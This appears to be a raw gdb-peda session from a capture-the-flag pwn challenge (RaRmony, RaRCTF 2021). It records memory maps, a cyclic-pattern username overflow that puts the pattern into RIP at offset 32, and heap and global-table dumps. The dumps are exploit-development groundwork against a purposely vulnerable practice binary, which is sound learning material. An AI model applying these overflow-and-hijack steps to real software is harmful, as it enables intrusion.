gdb-peda$ vmmap
Start              End                Perm	Name
0x00400000         0x00401000         r--p	/home/mito/CTF/RaRCTF_2021/Pwn_RaRmony_500/rarmony/harmony
0x00401000         0x00402000         r-xp	/home/mito/CTF/RaRCTF_2021/Pwn_RaRmony_500/rarmony/harmony
0x00402000         0x00403000         r--p	/home/mito/CTF/RaRCTF_2021/Pwn_RaRmony_500/rarmony/harmony
0x00403000         0x00404000         r--p	/home/mito/CTF/RaRCTF_2021/Pwn_RaRmony_500/rarmony/harmony
0x00404000         0x00405000         rw-p	/home/mito/CTF/RaRCTF_2021/Pwn_RaRmony_500/rarmony/harmony
0x00405000         0x00426000         rw-p	[heap]
0x00007ffff79e2000 0x00007ffff7bc9000 r-xp	/lib/x86_64-linux-gnu/libc-2.27.so
0x00007ffff7bc9000 0x00007ffff7dc9000 ---p	/lib/x86_64-linux-gnu/libc-2.27.so
0x00007ffff7dc9000 0x00007ffff7dcd000 r--p	/lib/x86_64-linux-gnu/libc-2.27.so
0x00007ffff7dcd000 0x00007ffff7dcf000 rw-p	/lib/x86_64-linux-gnu/libc-2.27.so
0x00007ffff7dcf000 0x00007ffff7dd3000 rw-p	mapped
0x00007ffff7dd3000 0x00007ffff7dfc000 r-xp	/lib/x86_64-linux-gnu/ld-2.27.so
0x00007ffff7fd5000 0x00007ffff7fd7000 rw-p	mapped
0x00007ffff7ff7000 0x00007ffff7ffa000 r--p	[vvar]
0x00007ffff7ffa000 0x00007ffff7ffc000 r-xp	[vdso]
0x00007ffff7ffc000 0x00007ffff7ffd000 r--p	/lib/x86_64-linux-gnu/ld-2.27.so
0x00007ffff7ffd000 0x00007ffff7ffe000 rw-p	/lib/x86_64-linux-gnu/ld-2.27.so
0x00007ffff7ffe000 0x00007ffff7fff000 rw-p	mapped
0x00007ffffffde000 0x00007ffffffff000 rw-p	[stack]
0xffffffffff600000 0xffffffffff601000 r-xp	[vsyscall]

> 2
Enter new role name: 11111111111111111111111111111111111111111111111111111111111111111111111111111111111

Harmony: Chat for CTFers

0. Read Channel
1. View User Info
2. Change role name
3. Change username
> Unknown option

Harmony: Chat for CTFers

0. Read Channel
1. View User Info
2. Change role name
3. Change username
> 3
Enter new username: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%G

Harmony: Chat for CTFers

0. Read Channel
1. View User Info
2. Change role name
3. Change username
> 
Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
RAX: 0x4056a0 --> 0x200000002 
RBX: 0x0 
RCX: 0x0 
RDX: 0x414541412941 ('A)AAEA')
RSI: 0x0 
RDI: 0x4056a0 --> 0x200000002 
RBP: 0x7fffffffdda0 --> 0x7fffffffddb0 --> 0x401ae0 (<__libc_csu_init>:	endbr64)
RSP: 0x7fffffffdd88 --> 0x401968 (<menu+290>:	jmp    0x401979 <menu+307>)
RIP: 0x414541412941 ('A)AAEA')
R8 : 0x0 
R9 : 0xfffffffffffffffe 
R10: 0x40233d --> 0x6f6e6b6e55006425 ('%d')
R11: 0x40233f --> 0x6e776f6e6b6e5500 ('')
R12: 0x401140 (<_start>:	endbr64)
R13: 0x7fffffffde90 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x414541412941
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffdd88 --> 0x401968 (<menu+290>:	jmp    0x401979 <menu+307>)
0008| 0x7fffffffdd90 --> 0x3ffffdda0 
0016| 0x7fffffffdd98 --> 0x7110c248600e4700 
0024| 0x7fffffffdda0 --> 0x7fffffffddb0 --> 0x401ae0 (<__libc_csu_init>:	endbr64)
0032| 0x7fffffffdda8 --> 0x401ad4 (<main+83>:	jmp    0x401aca <main+73>)
0040| 0x7fffffffddb0 --> 0x401ae0 (<__libc_csu_init>:	endbr64)
0048| 0x7fffffffddb8 --> 0x7ffff7a03bf7 (<__libc_start_main+231>:	mov    edi,eax)
0056| 0x7fffffffddc0 --> 0x1 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000414541412941 in ?? ()
gdb-peda$ patto A)AA
A)AA found at offset: 32
gdb-peda$ 

gdb-peda$ x/80gx 0x4056a0
0x4056a0:	0x0000000200000002	0x000000000040153b
0x4056b0:	0x4173414125414141	0x6e41412441414241
0x4056c0:	0x41412d4141434141	0x413b414144414128
0x4056d0:	0x0000414541412941	0x0000000000000041
0x4056e0:	0x0000000000000003	0x000000000040153b
0x4056f0:	0x3534386d61776977	0x0000000000000000
0x405700:	0x0000000000000000	0x0000000000000000
0x405710:	0x0000000000401553	0x0000000000000041


gdb-peda$ x/150gx 0x00404000
0x404000:	0x0000000000403e10	0x00007ffff7ffe170
0x404010:	0x00007ffff7dea8f0	0x00007ffff7a98950
0x404020:	0x00007ffff7a98320	0x00007ffff7a5e2c0
0x404030:	0x00007ffff7a62aa0	0x0000000000401076
0x404040:	0x0000000000401086	0x00007ffff7a46f70
0x404050:	0x00007ffff7af22e0	0x00000000004010b6
0x404060:	0x00007ffff7a69fd0	0x00007ffff7a79140
0x404070:	0x00007ffff7a605c0	0x00007ffff7a633d0
0x404080:	0x00007ffff7af1d10	0x00007ffff7a5dfa0
0x404090:	0x00007ffff7a9b310	0x0000000000401136
0x4040a0:	0x0000000000000000	0x0000000000000000
0x4040b0:	0x0000000000000000	0x0000000000000000
0x4040c0 <channelNames>:	0x0000000000402020	0x0000000000402028
0x4040d0 <channelNames+16>:	0x000000000040202c	0x000000000040203e
0x4040e0 <channelNames+32>:	0x0000000000402052	0x0000000000402059
0x4040f0 <channelNames+48>:	0x000000000040205e	0x0000000000402062
0x404100 <channelNames+64>:	0x0000000000402067	0x0000000000000000
0x404110:	0x0000000000000000	0x0000000000000000
0x404120 <userNames>:	0x00000000004020a4	0x00000000004020a9
0x404130 <userNames+16>:	0x00000000004020b7	0x00000000004020c8
0x404140 <userNames+32>:	0x00000000004020d1	0x00000000004020d6
0x404150 <userNames+48>:	0x00000000004020de	0x00000000004020e7
0x404160 <userNames+64>:	0x00000000004020f6	0x0000000000402103
0x404170 <userNames+80>:	0x000000000040210b	0x0000000000402117
0x404180 <userNames+96>:	0x0000000000402120	0x0000000000402126
0x404190 <userNames+112>:	0x0000000000402130	0x0000000000402134
0x4041a0 <userNames+128>:	0x0000000000402138	0x0000000000402146
0x4041b0 <userNames+144>:	0x000000000040214a	0x0000000000402150
0x4041c0 <userNames+160>:	0x0000000000402159	0x000000000040215e
0x4041d0 <userNames+176>:	0x0000000000402163	0x000000000040216b
0x4041e0 <roleNames>:	0x00000000004021dc	0x00000000004021e6
0x4041f0 <roleNames+16>:	0x00000000004021ea	0x0000000000000000
0x404200 <roleCols>:	0x00000000004021f6	0x00000000004021fd
0x404210 <roleCols+16>:	0x0000000000402204	0x0000000000000000
0x404220 <stdout@GLIBC_2.2.5>:	0x00007ffff7dce760	0x0000000000000000
0x404230 <stdin@GLIBC_2.2.5>:	0x00007ffff7dcda00	0x0000000000000000
0x404240 <channels>:	0x0000000000405350	0x00000000004053a0
0x404250 <channels+16>:	0x00000000004053f0	0x0000000000405440
0x404260 <channels+32>:	0x0000000000405490	0x00000000004054e0
0x404270 <channels+48>:	0x0000000000405530	0x0000000000405580
0x404280 <channels+64>:	0x00000000004055d0	0x0000000000000000
0x404290:	0x0000000000000000	0x0000000000000000
0x4042a0 <users>:	0x0000000000405620	0x0000000000405660
0x4042b0 <users+16>:	0x00000000004056a0	0x00000000004056e0
0x4042c0 <users+32>:	0x0000000000405720	0x0000000000405760
0x4042d0 <users+48>:	0x00000000004057a0	0x00000000004057e0
0x4042e0 <users+64>:	0x0000000000405820	0x0000000000405860
0x4042f0 <users+80>:	0x00000000004058a0	0x00000000004058e0
0x404300 <users+96>:	0x0000000000405920	0x0000000000405960
0x404310 <users+112>:	0x00000000004059a0	0x00000000004059e0
0x404320 <users+128>:	0x0000000000405a20	0x0000000000405a60
0x404330 <users+144>:	0x0000000000405aa0	0x0000000000405ae0
0x404340 <users+160>:	0x0000000000405b20	0x0000000000405b60
0x404350 <users+176>:	0x0000000000405ba0	0x0000000000000000
0x404360 <roles>:	0x0000000000405260	0x00000000004052b0
0x404370 <roles+16>:	0x0000000000405300	0x00000000004056a0
0x404380:	0x0000000000000000	0x0000000000000000
0x404390:	0x0000000000000000	0x0000000000000000


gdb-peda$ x/80gx 0x4056a0
0x4056a0:	0x0000000200000002	0x000000000040153b
0x4056b0:	0x687465656c6f7270	0x37333331726f7861
0x4056c0:	0x0000000000000000	0x0000000000000000


0x405240:	0x0000000000000000	0x0000000000000000
0x405250:	0x0000000000000000	0x0000000000000051
0x405260:	0x333b305b00000000	0x6e6167724f006d31
0x405270:	0x0000000072657369	0x0000000000000000
0x405280:	0x0000000000000000	0x0000000000000000
0x405290:	0x0000000000000000	0x00000000004015e2
0x4052a0:	0x0000000000000000	0x0000000000000051
0x4052b0:	0x333b305b00000001	0x0000746f42006d34
0x4052c0:	0x0000000000000000	0x0000000000000000
0x4052d0:	0x0000000000000000	0x0000000000000000
0x4052e0:	0x0000000000000000	0x00000000004015e2
0x4052f0:	0x0000000000000000	0x0000000000000051
0x405300:	0x333b305b00000002	0x6974726150006d32
0x405310:	0x0000746e61706963	0x0000000000000000
0x405320:	0x0000000000000000	0x0000000000000000
0x405330:	0x0000000000000000	0x00000000004015e2
0x405340:	0x0000000000000000	0x0000000000000051
0x405350:	0x0000000300000000	0x656e656700000003
0x405360:	0x00000000006c6172	0x0000000000000000
0x405370:	0x0000000000000000	0x0000000000000000
0x405380:	0x0000000000000000	0x0000000000000000
0x405390:	0x0000000000000000	0x0000000000000051
0x4053a0:	0x0000000400000001	0x006e777000000003
0x4053b0:	0x0000000000000000	0x0000000000000000
0x4053c0:	0x0000000000000000	0x0000000000000000
0x4053d0:	0x0000000000000000	0x0000000000000000
0x4053e0:	0x0000000000000000	0x0000000000000051
0x4053f0:	0x0000000500000002	0x7263657300000000

0x405400:	0x6e696d64612d7465	0x000000746168632d
0x405410:	0x0000000000000000	0x0000000000000000
0x405420:	0x0000000000000000	0x0000000000000000
0x405430:	0x0000000000000000	0x0000000000000051
0x405440:	0x0000000600000003	0x6d61657400000003
0x405450:	0x726f7461636f6c2d	0x00726f74616e692d
0x405460:	0x0000000000000000	0x0000000000000000
0x405470:	0x0000000000000000	0x0000000000000000
0x405480:	0x0000000000000000	0x0000000000000051
0x405490:	0x0000000700000004	0x7079726300000003
0x4054a0:	0x0000000000006f74	0x0000000000000000
0x4054b0:	0x0000000000000000	0x0000000000000000
0x4054c0:	0x0000000000000000	0x0000000000000000
0x4054d0:	0x0000000000000000	0x0000000000000051
0x4054e0:	0x0000000800000005	0x6d61707300000003
0x4054f0:	0x0000000000000000	0x0000000000000000
0x405500:	0x0000000000000000	0x0000000000000000
0x405510:	0x0000000000000000	0x0000000000000000
0x405520:	0x0000000000000000	0x0000000000000051
0x405530:	0x0000000900000006	0x0076657200000003
0x405540:	0x0000000000000000	0x0000000000000000
0x405550:	0x0000000000000000	0x0000000000000000
0x405560:	0x0000000000000000	0x0000000000000000
0x405570:	0x0000000000000000	0x0000000000000051
0x405580:	0x0000000a00000007	0x6373696d00000003
0x405590:	0x0000000000000000	0x0000000000000000
0x4055a0:	0x0000000000000000	0x0000000000000000
0x4055b0:	0x0000000000000000	0x0000000000000000
0x4055c0:	0x0000000000000000	0x0000000000000051
0x4055d0:	0x0000000b00000008	0x0062657700000003
0x4055e0:	0x0000000000000000	0x0000000000000000
0x4055f0:	0x0000000000000000	0x0000000000000000
0x405600:	0x0000000000000000	0x0000000000000000
0x405610:	0x0000000000000000	0x0000000000000041
0x405620:	0x0000000000000000	0x000000000040153b
0x405630:	0x00000000796e6f54	0x0000000000000000
0x405640:	0x0000000000000000	0x0000000000000000
0x405650:	0x0000000000401553	0x0000000000000041
0x405660:	0x0000000100000001	0x000000000040153b
0x405670:	0x7665696c65626e55	0x00000074616f4261
0x405680:	0x0000000000000000	0x0000000000000000
0x405690:	0x0000000000401553	0x0000000000000041

Num     Type           Disp Enb Address            What
1       breakpoint     keep y   0x00000000004018b2 <menu+108>
	breakpoint already hit 5 times
2       breakpoint     keep y   0x0000000000401792 <print_channel+126>
	breakpoint already hit 2 times
3       breakpoint     keep y   0x0000000000401309 <setup_channels+227>
	breakpoint already hit 9 times
4       breakpoint     keep y   0x0000000000401735 <print_channel+33>
	breakpoint already hit 5 times
